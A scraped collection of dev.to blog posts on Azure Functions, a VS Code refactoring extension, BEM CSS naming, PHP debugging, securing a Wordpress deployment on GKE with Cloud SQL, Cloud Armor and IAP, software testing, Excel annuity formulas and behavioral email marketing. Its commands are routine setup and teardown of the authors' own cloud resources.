- I stored my Twitter app keys in Azure Key Vault and referenced the secrets in my Function App settings/configuration. The reference follows the pattern `@Microsoft.KeyVault(SecretUri=[URI copied from the Key Vault Secret])`.
One cool thing here is: you might make a copy & paste error but Azure has you covered there as it will validate the reference and put a checkmark if everything is fine (valid URI and valid access rights):

- Use the Azure Storage Explorer to analyze you Durable Function executions. You can use it locally or with your resources in Azure. It really helps you a lot when you need to dig into that.
- Do logging in your Functions. And if you thing you have enough, think again. This can really help you with narrowing down errors especially in a setup with nested orchestrations
- Separate configuration and code i.e. use environment variables/App setting to increase the flexibility of your setup and avoid magic numbers and magic strings as far as possible.
- Use _Azure Application Insights_. The effort for the basic setup is minimal and it is a huge help when you need to analyze errors, performance issues etc.
- Create _budget alerts_. Although we are at the lower end of costs, maybe some errors occur that make your Functions run crazy, then this is thing comes to your rescue. I also have an unexpected high usage of the storage that I might need to investigate on.
Writing this blog post, the Twitter bot is running only a week, so everything looks fine so far. This also means no deeper insights with respect to productive usage in this project so it would be a bit artificial to make statements about best practices there.
If you want to read a bit more about it from the experience that is more settled I would recommend the blog post [My learnings from running the Azure Functions Updates Twitterbot for half a year](https://blog.marcduiker.nl/2019/09/05/my-learnings-from-running-the-azure-functions-updates-twitterbot-for-half-a-year.html) by [Marc Duiker](https://www.polywork.com/marcduiker).
## Conclusion and Outlook
So here we are now. We have a Twitter Bot up and running making use of Azure Durable Functions (including sub-orchestrators) in TypeScript. I experienced a huge improvement in this area over the last years although the _primus inter pares_ with respect to the Azure Functions runtimes is still .NET in my opinion.
The experience of setting up the Functions and deploying them was smooth and I especially like the possibility to do the development completely locally. This also got improved with Azurite now.
There were no real frustrating bumpers along the way besides the usual "finding the right npm package".
So wrapping up: I hope you find some useful hints and learnings in this post and give Durable Functions a try also in more complex business process like scenarios.
| lechnerc77 |
736,519 | P42 for Visual Studio Code | 💡 This blog post is about P42 JavaScript Assistant v0.0.3 P42 for Visual Studio Code is now... | 13,408 | 2021-06-23T09:09:49 | https://p42.ai/blog/2021-06-23/p42-for-visual-studio-code | vscode, javascript, typescript | > 💡 This blog post is about P42 JavaScript Assistant v0.0.3
[P42 for Visual Studio Code](https://marketplace.visualstudio.com/items?itemName=p42ai.refactor) is now available in the Visual Studio Marketplace.
The **free extension includes all refactorings and code modernizations** that are available in P42. It can be used on all repositories and runs entirely locally.
When you open a JavaScript or TypeScript file, P42 will automatically detect code that could be modernized and highlight it:

You can then effortlessly update your code using the Quick Fix function.
With P42 for Visual Studio Code, you can learn new JavaScript patterns right in your IDE, make sure new code follows best practices, and modernize older code gradually.
**[Try out P42 for Visual Studio Code today!](https://marketplace.visualstudio.com/items?itemName=p42ai.refactor)** | lgrammel |
736,549 | cute owl using css and html | A post by Saba Alikhani | 0 | 2021-06-23T09:45:25 | https://dev.to/fydsa/cute-owl-using-css-and-html-1jge | codepen, css, html | {% codepen https://codepen.io/fydsa/pen/qBrzqor %} | fydsa |
736,565 | BEM For Beginners | Naming things in programming is not easy,not only in programming but also in css.Some programmers... | 0 | 2021-06-23T10:08:55 | https://dev.to/cglikpo/css-bem-made-easy-40i3 | css, codenewbie, methodologies, bem | Naming things in programming is not easy,not only in programming but also in css.Some programmers don't give naming much thought. They say that there isn't enough time to choose the name each class should have. That may be true, but low-quality code takes significantly longer to develop in the long term.So there are several ways to resolving the name issue, one of which is known as Block-Element-Modifier (BEM). We'll take a deeper look at what BEM is and how to use it to arrange your CSS code in this post.
## What is BEM?
BEM stands for Block, Element, and Modifier. It’s a CSS naming convention for writing cleaner and more readable CSS classes.
BEM also aims to write independent CSS blocks in order to reuse them later in your project.
```
// Blocks are named as standard CSS classes
.block {
}
// Elements declared with 2 underscores, after block
.block__element {
}
// Modifiers declared with 2 dashes, after block or after element
.block--modifier {
}
// element and modifier together
.block__element--modifier {
}
```
### What is a Block?
Blocks are independent, reusable and usually bigger components of a webpage. They can have modifiers and contain elements.
We can count bigger parts in a webpage like header,nav,section, form,article,aside,footer as block examples.
For example, LinkedIn’s Header Navigation can be used as a block, and can be declared as:
```
<header class="global-nav"></header>
<style>
.global-nav {
// Rules
}
</style>
```
###Elements
Elements are children of blocks. An element can only have 1 parent Block, and can’t be used independently outside of that block.Example of linkedIn Header elements are:linkedIn logo,search field and the rests.
An element's name must begin with the name of its parent Block, followed by two underscores, and then the element's own name.
```
<header class="global-nav">
<div class="global-nav__content">
<div class="global-nav__top-left-part">
<a href="#" class="global-nav__branding">
<img class="global-nav__logo" />
</a>
<div class="search-global">
<input class="search-global__input" />
<div class="search-global__icon-container">
<img class="search-global__icon" />
</div>
</div>
</div>
<nav class="global-nav__top-right-part">
<ul class="gloabl-nav__items">
<li class="gloabl-nav__item">
<a href="#" class="global-nav__primary-link">
<img class="global-nav__icon"/>
<span class="global-nav__primary-link-text">Home</span>
</a>
</li>
</ul>
</nav>
</div>
</header>
```
###Modifiers
Different states or styles of classes are represented by modifiers. They may be used for blocks as well as elements.
In HTML, a modifier must be used in conjunction with its Block / Element to provide additional functionality:
```
<button class="button button--success">
Success button
</button>
<button class="button button--danger">
Danger button
</button>
```
The naming of a modifier must start with its parent Block name, 2 dashes after it, and end with its own name.
#### Block — Modifier:
```
.btn {
// rules
.btn--primary {} // Block modifiers
.btn--secondary {}
}{% youtube LPHobzrF8xw %}
```
Let see it in action:
{% youtube ZQpPydztf7g %}
### Conclusion
BEM is a new way of authoring CSS that is cleaner and easier to maintain. However, there are some arguments against BEM, claiming that it is ineffective.
Whether you use BEM or not is up to you, your team, and maybe the project. What are your thoughts? Do you prefer to use BEM?
If you like my work, please consider
[](https://www.buymeacoffee.com/cglikpo)
so that I can bring more projects, more articles for you
If you want to learn more about Web Development, feel free to [follow me on Youtube!](https://www.youtube.com/c/ChristopherGlikpo)
| cglikpo |
736,607 | How to Debug Php code | Writing code is hard enough, and having to debug any problems that occur in your code just makes it... | 0 | 2021-06-23T11:22:25 | https://dev.to/cglikpo/how-to-debug-php-code-21gd | php, codenewbie, tutorial, programming | Writing code is hard enough, and having to debug any problems that occur in your code just makes it even harder. Debugging is also much less enjoyable than writing code. Debugging is as old as programming itself. As software engineers,you will always be faced with bugs. To debug well,you need to know how to debug your code.
That is why in this video I will show you some tips, tricks, and tactics on how you can debug code to make your debugging process quicker, easier, and more enjoyable. This will give you more time to focus on the fun part of coding. I will show you how to debug errors in PHP Scripts.
{% youtube iaynJkeLWlc %}
If you want to learn more about Web Development, feel free to [follow me on Youtube!](https://www.youtube.com/c/ChristopherGlikpo) | cglikpo |
736,639 | Securing the connectivity between a GKE application and a Cloud SQL database | In the previous part we created our Cloud SQL instance. In this part, we'll put them all together and... | 13,254 | 2021-06-24T12:51:42 | https://dev.to/stack-labs/securing-the-connectivity-between-a-gke-application-and-a-cloud-sql-database-4d6b | googlecloud, kubernetes, terraform, mysql | In the [previous part][part-4] we created our Cloud SQL instance. In this part, we'll put them all together and deploy Wordpress to Kubernetes and connect it to the Cloud SQL database. Our objectives are to:
* Create the IAM Service Account to connect to the Cloud SQL instance. It will be associated to the Wordpress Kubernetes service account.
* Create 2 deployments: One for Wordpress and one for the [Cloud SQL Proxy][gcp-6].
* Create the Cloud Armor security policy to restrict load balancer traffic to only authorized networks.
* Configure the OAuth consent screen and credentials to enable Identity Aware Proxy.
* Create SSL certificates and enable the HTTPs redirection.

# IAM Service Account
[Workload Identity][gcp-1] is the recommended way to access Google Cloud services from applications running within GKE.
> With Workload Identity, you can configure a Kubernetes service account to act as a Google service account. Pods running as the Kubernetes service account will automatically authenticate as the Google service account when accessing Google Cloud APIs.
Let's create this Google service account. Create the file `infra/plan/service-account.tf`.
```terraform
resource "google_service_account" "web" {
account_id = "cloud-sql-access"
display_name = "Service account used to access cloud sql instance"
}
resource "google_project_iam_binding" "cloudsql_client" {
role = "roles/cloudsql.client"
members = [
"serviceAccount:cloud-sql-access@${data.google_project.project.project_id}.iam.gserviceaccount.com",
]
}
data "google_project" "project" {
}
```
And the associated Kubernetes service account in `infra/k8s/data/service-account.yaml`:
```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
annotations:
iam.gke.io/gcp-service-account: cloud-sql-access@<PROJECT_ID>.iam.gserviceaccount.com
name: cloud-sql-access
```
Let's run our updated terraform:
```shell
cd infra/plan
terraform apply
```
And create the Kubernetes service account:
```shell
gcloud container clusters get-credentials private --region $REGION --project $PROJECT_ID
$ kubectl create namespace wordpress
sed -i "s/<PROJECT_ID>/$PROJECT_ID/g;" infra/k8s/data/service-account.yaml
$ kubectl create -f infra/k8s/data/service-account.yaml -n wordpress
```
The Kubernetes service account will be used by the Cloud SQL Proxy deployment to access the Cloud SQL instance.
Allow the Kubernetes service account to impersonate the created Google service account by an IAM policy binding between the two:
```shell
gcloud iam service-accounts add-iam-policy-binding \
--role roles/iam.workloadIdentityUser \
--member "serviceAccount:$PROJECT_ID.svc.id.goog[wordpress/cloud-sql-access]" \
cloud-sql-access@$PROJECT_ID.iam.gserviceaccount.com
```
# Cloud SQL Proxy
We use the Cloud SQL Auth proxy to secure access to our Cloud SQL instance without the need for Authorized networks or for configuring SSL.
Let's begin by the deployment resource:
`infra/k8s/data/deployment.yaml`
```yaml
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: cloud-sql-proxy
name: cloud-sql-proxy
spec:
selector:
matchLabels:
app: cloud-sql-proxy
strategy: {}
replicas: 3
template:
metadata:
labels:
app: cloud-sql-proxy
spec:
serviceAccountName: cloud-sql-access
containers:
- name: cloud-sql-proxy
image: gcr.io/cloudsql-docker/gce-proxy:1.23.0
ports:
- containerPort: 3306
protocol: TCP
envFrom:
- configMapRef:
name: cloud-sql-instance
command:
- "/cloud_sql_proxy"
- "-ip_address_types=PRIVATE"
- "-instances=$(CLOUD_SQL_PROJECT_ID):$(CLOUD_SQL_INSTANCE_REGION):$(CLOUD_SQL_INSTANCE_NAME)=tcp:0.0.0.0:3306"
securityContext:
runAsNonRoot: true
resources:
requests:
memory: 2Gi
cpu: 1
```
The deployment resource refers to the service account created earlier. Cloud SQL instance details are retrieved from a Kubernetes config map:
`infra/k8s/data/config-map.yaml`
```yaml
apiVersion: v1
kind: ConfigMap
metadata:
name: cloud-sql-instance
data:
CLOUD_SQL_INSTANCE_NAME: <CLOUD_SQL_INSTANCE_NAME>
CLOUD_SQL_INSTANCE_REGION: <CLOUD_SQL_REGION>
CLOUD_SQL_PROJECT_ID: <CLOUD_SQL_PROJECT_ID>
```
We expose the deployment resource using a Kubernetes service:
`infra/k8s/data/service.yaml`
```yaml
apiVersion: v1
kind: Service
metadata:
labels:
app: cloud-sql-proxy
name: cloud-sql-proxy
spec:
ports:
- port: 3306
protocol: TCP
name: cloud-sql-proxy
targetPort: 3306
selector:
app: cloud-sql-proxy
```
Let's create our resources and check if the connection is established:
```shell
cd infra/plan
sed -i "s/<CLOUD_SQL_PROJECT_ID>/$PROJECT_ID/g;s/<CLOUD_SQL_INSTANCE_NAME>/$(terraform output cloud-sql-instance-name | tr -d '"')/g;s/<CLOUD_SQL_REGION>/$REGION/g;" ../k8s/data/config-map.yaml
$ kubectl create -f ../k8s/data -n wordpress
$ kubectl get pods -l app=cloud-sql-proxy -n wordpress
NAME READY STATUS RESTARTS AGE
cloud-sql-proxy-fb9968d49-hqlwb 1/1 Running 0 4s
cloud-sql-proxy-fb9968d49-wj498 1/1 Running 0 5s
cloud-sql-proxy-fb9968d49-z95zw 1/1 Running 0 4s
$ kubectl logs cloud-sql-proxy-fb9968d49-hqlwb -n wordpress
2021/06/23 14:43:21 current FDs rlimit set to 1048576, wanted limit is 8500. Nothing to do here.
2021/06/23 14:43:25 Listening on 0.0.0.0:3306 for <PROJECT_ID>:<REGION>:<CLOUD_SQL_INSTANCE_NAME>
2021/06/23 14:43:25 Ready for new connections
```
Ok! Let's move on to the Wordpress application
# Wordpress application
Let's begin by the deployment resource:
`infra/k8s/web/deployment.yaml`
```yaml
apiVersion: apps/v1
kind: Deployment
metadata:
name: wordpress
labels:
app: wordpress
spec:
selector:
matchLabels:
app: wordpress
strategy:
type: Recreate
template:
metadata:
labels:
app: wordpress
spec:
containers:
- image: wordpress
name: wordpress
env:
- name: WORDPRESS_DB_HOST
value: cloud-sql-proxy:3306
- name: WORDPRESS_DB_USER
value: wordpress
- name: WORDPRESS_DB_NAME
value: wordpress
- name: WORDPRESS_DB_PASSWORD
valueFrom:
secretKeyRef:
name: mysql
key: password
ports:
- containerPort: 80
name: wordpress
volumeMounts:
- name: wordpress-persistent-storage
mountPath: /var/www/html
livenessProbe:
initialDelaySeconds: 30
httpGet:
port: 80
path: /wp-admin/install.php # at the very beginning, this is the only accessible page. Don't forget to change to /wp-login.php
readinessProbe:
httpGet:
port: 80
path: /wp-admin/install.php
resources:
requests:
cpu: 1000m
memory: 2Gi
limits:
cpu: 1200m
memory: 2Gi
volumes:
- name: wordpress-persistent-storage
persistentVolumeClaim:
claimName: wordpress
```
`infra/k8s/web/service.yaml`
```yaml
apiVersion: v1
kind: Service
metadata:
name: wordpress
annotations:
cloud.google.com/neg: '{"ingress": true}'
spec:
type: ClusterIP
ports:
- port: 80
targetPort: 80
selector:
app: wordpress
```
> The `cloud.google.com/neg` annotation specifies that port 80 will be associated with a [zonal network endpoint group (NEG)][gcp-7]. See [Container-native load balancing][gcp-8] for information on the benefits, requirements, and limitations of container-native load balancing.
We create a PVC for Wordpress:
`infra/k8s/web/volume-claim.yaml`
```yaml
kind: PersistentVolumeClaim
apiVersion: v1
metadata:
name: wordpress
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 5Gi
```
We finish this section by initializing our Kubernetes ingress resource. This resource will allow us to access the Wordpress application from the internet.
Create the file `infra/k8s/web/ingress.yaml`
```yaml
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
annotations:
kubernetes.io/ingress.global-static-ip-name: "wordpress"
kubernetes.io/ingress.class: "gce"
name: wordpress
spec:
defaultBackend:
service:
name: wordpress
port:
number: 80
rules:
- http:
paths:
- path: /*
pathType: ImplementationSpecific
backend:
service:
name: wordpress
port:
number: 80
```
> The `kubernetes.io/ingress.global-static-ip-name` annotation specifies the name of the global IP address resource to be associated with the HTTP(S) Load Balancer. [2]
Let's create our resources and test the Wordpress application:
```shell
cd infra/k8s
$ kubectl create secret generic mysql \
--from-literal=password=$(gcloud secrets versions access latest --secret=wordpress-admin-user-password --project $PROJECT_ID) -n wordpress
gcloud compute addresses create wordpress --global
$ kubectl create -f web -n wordpress
$ kubectl get pods -l app=wordpress -n wordpress
NAME READY STATUS RESTARTS AGE
wordpress-6d58d85845-2d7x2 1/1 Running 0 10m
$ kubectl get ingress -n wordpress
NAME CLASS HOSTS ADDRESS PORTS AGE
wordpress <none> * 34.117.187.51 80 16m
```

Anyone can have access to the application. Let's create a Cloud Armor security policy to restrict traffic to the only authorized network.
# Cloud Armor security policy
We use [Cloud Armor security policy][gcp-2] to filter incoming traffic that is destined to external HTTP(S) load balancers.
Create the `ìnfra/plan/cloud-armor.tf`:
```terraform
resource "google_compute_security_policy" "wordpress" {
name = "wordpress"
rule {
action = "allow"
priority = "1000"
match {
versioned_expr = "SRC_IPS_V1"
config {
src_ip_ranges = var.authorized_source_ranges
}
}
description = "Allow access to authorized source ranges"
}
rule {
action = "deny(403)"
priority = "2147483647"
match {
versioned_expr = "SRC_IPS_V1"
config {
src_ip_ranges = ["*"]
}
}
description = "default rule"
}
}
```
Let's run our updated terraform:
```shell
cd infra/plan
terraform apply
```

Now, let's create a backend config in Kubernetes and reference the security policy.
> BackendConfig custom resource definition (CRD) allows us to further customize the load balancer. This CRD allows us to define additional load balancer features hierarchically, in a more structured way than annotations. [3]
`infra/k8s/web/backend.yaml`
```yaml
apiVersion: cloud.google.com/v1
kind: BackendConfig
metadata:
name: wordpress
spec:
securityPolicy:
name: wordpress
```
```shell
kubectl create -f infra/k8s/web/backend.yaml -n wordpress
```
Add the annotation `cloud.google.com/backend-config: '{"default": "wordpress"}'` in the wordpress service:
```shell
kubectl apply -f infra/k8s/web/service.yaml -n wordpress
```
Let's check if the HTTP Load balancer has attached the security policy:


It looks nice. Let's do a test.
Put a bad IP to test if we are rejected
```shell
gcloud compute security-policies rules update 1000 \
--security-policy wordpress \
--src-ip-ranges "85.56.40.96"
curl http://34.117.187.51/
<!doctype html><meta charset="utf-8"><meta name=viewport content="width=device-width, initial-scale=1"><title>403</title>403 Forbidden
```
Let's put a correct IP
```shell
gcloud compute security-policies rules update 1000 \
--security-policy wordpress \
--src-ip-ranges $(curl -s http://checkip.amazonaws.com/)
curl http://34.117.187.51/
<!doctype html>
<html lang="en-GB" >
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>admin – Just another WordPress site</title>
```
Ok!
With this Backend configuration, only employees in the same office can have access to the application. Now we want them to be authenticated to access the application as well. We can achieve this by using [Identity Aware Proxy (Cloud IAP)][gcp-3].
# Enabling Cloud IAP
We use IAP to establish a central authorization layer for our Wordpress application accessed by HTTPS.
> IAP is integrated through Ingress for GKE. This integration enables you to control resource-level access for employees instead of using a VPN. [1]
Follow the instructions described in the GCP documentation to:
* [Configure the OAuth consent screen][gcp-4]
* [Create the OAuth credentials][gcp-5]
* [Setting up IAP access][gcp-9]
Create a Kubernetes secret to wrap the OAuth client you created earlier:
```shell
CLIENT_ID_KEY=<CLIENT_ID_KEY>
CLIENT_SECRET_KEY=<CLIENT_SECRET_KEY>
kubectl create secret generic wordpress --from-literal=client_id=$CLIENT_ID_KEY \
--from-literal=client_secret=$CLIENT_SECRET_KEY \
-n wordpress
```
Let's update our Backend configuration
```yaml
apiVersion: cloud.google.com/v1
kind: BackendConfig
metadata:
name: wordpress
spec:
iap:
enabled: true
oauthclientCredentials:
secretName: wordpress
securityPolicy:
name: wordpress
```
Apply the changes:
```shell
kubectl apply -f infra/k8s/web/backend-config.yaml -n wordpress
```

Let's do a test

Ok!
# SSL Certificates
If you have a domain name, you can enable Google-managed SSL certificates using the CRD [ManagedCertificate][gcp-10].
> Google-managed SSL certificates are Domain Validation (DV) certificates that Google Cloud obtains and manages for your domains. They support multiple hostnames in each certificate, and Google renews the certificates automatically. [4]
Create the file `infra/k8s/web/ssl.yaml`
```yaml
apiVersion: networking.gke.io/v1
kind: ManagedCertificate
metadata:
name: wordpress
spec:
domains:
- <DOMAIN_NAME>
```
We can create the domain name using Terraform or simply with the gcloud command:
```shell
export PUBLIC_DNS_NAME=
export PUBLIC_DNS_ZONE_NAME=
gcloud dns record-sets transaction start --zone=$PUBLIC_DNS_ZONE_NAME
gcloud dns record-sets transaction add $(gcloud compute addresses list --filter=name=wordpress --format="value(ADDRESS)") --name=wordpress.$PUBLIC_DNS_NAME. --ttl=300 --type=A --zone=$PUBLIC_DNS_ZONE_NAME
gcloud dns record-sets transaction execute --zone=$PUBLIC_DNS_ZONE_NAME
sed -i "s/<DOMAIN_NAME>/wordpress.$PUBLIC_DNS_NAME/g;" infra/k8s/web/ssl.yaml
kubectl create -f infra/k8s/web/ssl.yaml -n wordpress
```
Add the annotation `networking.gke.io/managed-certificates: "wordpress"` in your ingress resource.

Let's do a test

Ok!
To redirect all HTTP traffic to HTTPS, we need to create a [FrontendConfig][gcp-11].
Create the file `infra/k8s/web/frontend-config.yaml`
```yaml
apiVersion: networking.gke.io/v1beta1
kind: FrontendConfig
metadata:
name: wordpress
spec:
redirectToHttps:
enabled: true
responseCodeName: MOVED_PERMANENTLY_DEFAULT
```
```shell
kubectl create -f infra/k8s/web/frontend-config.yaml -n wordpress
```
Add the annotation `networking.gke.io/v1beta1.FrontendConfig: "wordpress"` in your ingress resource.

Let's do a test
```shell
curl -s http://wordpress.<HIDDEN>.stack-labs.com/
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>301 Moved</TITLE></HEAD><BODY>
<H1>301 Moved</H1>
The document has moved
<A HREF="https://wordpress.<HIDDEN>.stack-labs.com/">here</A>.
</BODY></HTML>
```
Ok then!
# Conclusion
Congratulations! You have completed this long workshop. In this series we have:
* Created an isolated network to host our Cloud SQL instance
* Configured an Google Kubernetes Engine Autopilot cluster with fine-grained access control to Cloud SQL instance
* Tested the connectivity between a Kubernetes container and a Cloud SQL instance database.
* Secured the access to the Wordpress application
That's it!
# Clean
Remove the NEG resources. You will find them in `Compute Engine > Network Endpoint Group`.
Run the following commands:
```shell
terraform destroy
gcloud dns record-sets transaction remove $(gcloud compute addresses list --filter=name=wordpress --format="value(ADDRESS)") --name=wordpress.$PUBLIC_DNS_NAME. --ttl=300 --type=A --zone=$PUBLIC_DNS_ZONE_NAME
gcloud dns record-sets transaction execute --zone=$PUBLIC_DNS_ZONE_NAME
gcloud compute addresses delete wordpress
gcloud secrets delete wordpress-admin-user-password
```
# Final Words
[The source code is available on Gitlab][demo-repo].
If you have any questions or feedback, please feel free to leave a comment.
Otherwise, I hope I have helped you answer some of the hard questions about connecting GKE Autopilot to Cloud SQL and providing a pod level defense in depth security strategy at both the networking and authentication layers.
By the way, do not hesitate to share with peers 😊
Thanks for reading!
# Documentation
[1] https://cloud.google.com/iap/docs/enabling-kubernetes-howto
[2] https://cloud.google.com/kubernetes-engine/docs/tutorials/configuring-domain-name-static-ip
[3] https://cloud.google.com/kubernetes-engine/docs/how-to/ingress-features#configuring_ingress_features
[4] https://cloud.google.com/load-balancing/docs/ssl-certificates/google-managed-certs
[part-4]: https://dev.to/stack-labs/securing-sensitive-data-in-cloud-sql-23hg
[demo-repo]: http://google.fr
[gcp-1]: https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity
[gcp-2]: https://cloud.google.com/armor/docs/configure-security-policies
[gcp-3]: https://cloud.google.com/iap/docs/concepts-overview
[gcp-4]: https://cloud.google.com/iap/docs/enabling-kubernetes-howto#oauth-configure
[gcp-5]: https://cloud.google.com/iap/docs/enabling-kubernetes-howto#oauth-credentials
[gcp-6]: https://cloud.google.com/sql/docs/mysql/sql-proxy
[gcp-7]: https://cloud.google.com/load-balancing/docs/negs
[gcp-8]: https://cloud.google.com/kubernetes-engine/docs/concepts/container-native-load-balancing
[gcp-9]: https://cloud.google.com/iap/docs/enabling-kubernetes-howto#iap-access
[gcp-10]: https://cloud.google.com/kubernetes-engine/docs/how-to/managed-certs
[gcp-11]: https://cloud.google.com/kubernetes-engine/docs/how-to/ingress-features#associating_frontendconfig_with_your_ingress
[demo-repo]: https://gitlab.com/Chabane87/securing-the-connectivity-between-gke-and-cloud-sql | chabane |
737,322 | Testes são formas de organizar pensamentos e não apenas usar ferramentas | Criar teste é mais sobre uma forma de pensar do que apenas saber usar as ferramentas. Eu tenho... | 0 | 2021-06-24T00:34:05 | https://dev.to/biosbug/testes-sao-formas-de-organizar-pensamentos-e-nao-apenas-usar-ferramentas-n3e | Criar teste é mais sobre uma forma de pensar do que apenas saber usar as ferramentas.
Eu tenho tentado buscar uma forma de pensar sobre testes, mas ainda não tenho um raciocínio lógico que possa definir alguma forma para iniciar meus testes.
O jeito está sendo conversar com as pessoas que admiro as suas maneiras de fazer pensar e saber delas como estruturam seus pensamentos, a minha idéia é poder a ter um raciocínio similar ao deles.
Encontrei esse texto que vai muito de encontro com as algumas formas que tenho ouvido das pessoas que admiro e confiaria meu aprendizado.
https://lnkd.in/efpipia
....A próxima vez que encontrar uma classe horrível pedindo para ser alterada, segure a mão e não saia deletando todo o código, tente fazer as coisas de uma forma disciplinada..... | biosbug | |
737,651 | Excel Formulas to Calculate the Payment for an Annuity ~ Quickly!! | Sometimes you need to calculate the payment for an annuity in Excel. This article will show you some... | 0 | 2021-06-30T10:47:03 | https://geekexcel.com/excel-formulas-to-calculate-the-payment-for-an-annuity/ | excelformula, excelformulas | ---
title: Excel Formulas to Calculate the Payment for an Annuity ~ Quickly!!
published: true
date: 2021-06-24 08:26:21 UTC
tags: ExcelFormula,Excelformulas
canonical_url: https://geekexcel.com/excel-formulas-to-calculate-the-payment-for-an-annuity/
---
Sometimes you need to **calculate the payment for an annuity in Excel**. This article will show you some methods to achieve it. Let’s jump into this article!! Get an official version of ** MS Excel** from the following link: [https://www.microsoft.com/en-in/microsoft-365/excel](https://www.microsoft.com/en-in/microsoft-365/excel)
[](https://geekexcel.com/excel-formulas-to-calculate-the-payment-for-an-annuity/calculate-the-payment-for-an-annuity/#main)<figcaption id="caption-attachment-47904">Calculate the payment for an annuity</figcaption>
## Generic Formula:
- If you want to find out the payment for an annuity, you can use the below formula.
**=PMT(rate,nper,pv,fv,type)**
## Syntax Explanations:
- **FV** – In Excel, the **PMT function** will help to return the periodic payment for a loan.
- **Rate** – It represents the interest rate.
- **Nper** – It is the total number of payment periods (months, quarters, years, etc.) in an annuity.
- **PV** – It represents the present value.
- **FV** – It specifies the future value.
- **Comma symbol (,)** – It is a separator that helps to separate a list of values.
- **Parenthesis ()** – The main purpose of this symbol is to group the elements.
## Practical Example:
Let’s consider the below example image.
- First, we will enter the input values in **Column B** and **Column C**.
- Here we need to calculate the annual payment.
<figcaption id="caption-attachment-47902">Input Ranges</figcaption>
- Select any cell and apply the above-given formula.
<figcaption id="caption-attachment-47901">Enter the formula</figcaption>
- Finally, press the ** ENTER** key, you can get the result as shown below.
<figcaption id="caption-attachment-47903">Result</figcaption>
## Wrap-Up:
In this chapter, we have described the formulas to **calculate the payment for an annuity in Excel**. We welcome your **comments** and **questions** about this lesson.
Thank you so much for visiting **[Geek Excel](https://geekexcel.com/)!! **If you want to learn more helpful formulas, check out [**Excel Formulas**](https://geekexcel.com/excel-formula/) **!! **
### Read Also:
- **[Excel Formulas to Calculate the Present Value of Annuity ~ Useful Tricks!!](https://geekexcel.com/excel-formulas-to-calculate-the-present-value-of-annuity/)**
- **[Formulas for Finding Largest Value Smaller than a Specified Number!!](https://geekexcel.com/formulas-for-finding-largest-value-smaller-than-a-specified-number/)**
- **[How to find Vlookup and Return the Matching Values from Multiple Worksheets?](https://geekexcel.com/how-to-find-vlookup-and-return-the-matching-values-from-multiple-worksheets/)**
- **[Excel Formulas to Compare Future Values Vs Present Value ~ Easily!!](https://geekexcel.com/excel-formulas-to-compare-future-values-vs-present-value/)**
| excelgeek |
737,692 | Top 5 Behavioral Emails Every Developer Tool Should Use | Double your open rate by using behavioral emails. | 0 | 2021-06-24T11:02:53 | https://www.moesif.com/blog/developer-marketing/behavioral-emails/Top-Five-Behavioral-Emails-Every-Developer-Tool-Should-Have/ | tools, email | ---
title: Top 5 Behavioral Emails Every Developer Tool Should Use
published: true
description: Double your open rate by using behavioral emails.
tags: tools, email
canonical_url: https://www.moesif.com/blog/developer-marketing/behavioral-emails/Top-Five-Behavioral-Emails-Every-Developer-Tool-Should-Have/
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ap01f03x6cxtb7f5qb2k.png
---
Double your open rate by using behavioral emails.
The best way of engaging your customers is to share content that resonates. And nothing resonates more than sending targeted emails to developers based on their own actions and behaviors.
In a companion blog post, [Behavioral Email Speeds API Integration](https://www.moesif.com/blog/technical/behavioral-emails/How-To-Accelerate-API-Integration-with-Behavioral-Emails-and-Developer-Segmentation?utm_source=devto&utm_medium=paid&utm_campaign=placed-article&utm_term=top-5-behavioral-emails), we explained how behaviorally-driven outreach to developers can speed API integration for an API product company. But what exactly are the best emails to get developers and product managers to integrate your API-first platform?
We examined thousands of emails that we sent out to our own customers and found that when we changed email focus from demographic/firmographic issues (company size & vertical, role, location, etc) to behavioral ones (developer funnel stage, endpoint issues, product utilization, rate limits, etc), we achieved a doubling in open rate, and a significant increase in API onboarding rate. By sending the right content to the right person at the right time, we’re able to improve our overall developer experience.
The top five behavioral emails that every API platform company should use are as follows:
## 1. Welcome Email Segmented by Goal
Upon signing up for your service, ask your prospective customer what they hope to achieve with your platform. For instance, in our onboarding workflow, one of our first steps is to inquire as to their goal:

In their welcome email make it clear that you listened to their key issue — explain how your product fulfils their needs. Use merge tags or personalization tokens and insert that same key issue into the Subject Line of the email and even its Header, as illustrated below.

## 2. Developer Integration Email Based on API Usage
Since API-first companies are ultimately most interested in driving integration, measure where developers are in their integration funnel and customize your email(s) accordingly to guide developers better along their journey. The best way to measure what stage they’re at, is to look at the number of API calls made. Trifurcating email messaging into three groups: top, middle and bottom of integration funnel, we get:

For more details see our [companion blog post’s section on usage based emails](https://www.moesif.com/blog/technical/behavioral-emails/How-To-Accelerate-API-Integration-with-Behavioral-Emails-and-Developer-Segmentation/#3-usage-based-emails?utm_source=devto&utm_medium=paid&utm_campaign=placed-article&utm_term=top-5-behavioral-emails).
## 3. Subscription Plan Notification
Self-service API platforms need to scale economically with number of users. One of the biggest management headaches in SaaS is often dealing with subscription issues. By tracking API call volume, it’s possible to handle quotas and plan adjustments automatically:

[](https://www.moesif.com/features/user-behavioral-emails?utm_source=devto&utm_medium=paid&utm_campaign=placed-article&utm_term=top-5-behavioral-emails)
## 4. Nuanced Error Warning
Service Level Agreements (SLAs), maintenance notifications and error warnings are usually governed by legal agreements. Not adhering to these covenants could cause anything from bad customer relations to financial penalties. By delving deep within your API platform itself, email warnings could be sent out based on nuanced API metrics:

## 5. New Features Email
Keeping customers abreast of the latest and greatest platform features can often be a sure-fire way to maintain engagement. This is especially true for those at the bottom of the integration funnel (those in production), since they’ll appreciate any new platform capabilities that might make their life easier. In fact, when we publicized our new behavioral email feature using the notification below, we saw email engagement ramp with how actively customers were using our platform.

# Increase Engagement & Drive Adoption With Behavioral Emails
Use this guide as a template for creating your own winning email campaign. We found that by employing the top 5 behavioral emails we were able to double open rate and accelerate integration…
[](https://www.moesif.com/features/user-behavioral-emails?utm_source=devto&utm_medium=paid&utm_campaign=placed-article&utm_term=top-5-behavioral-emails)
---
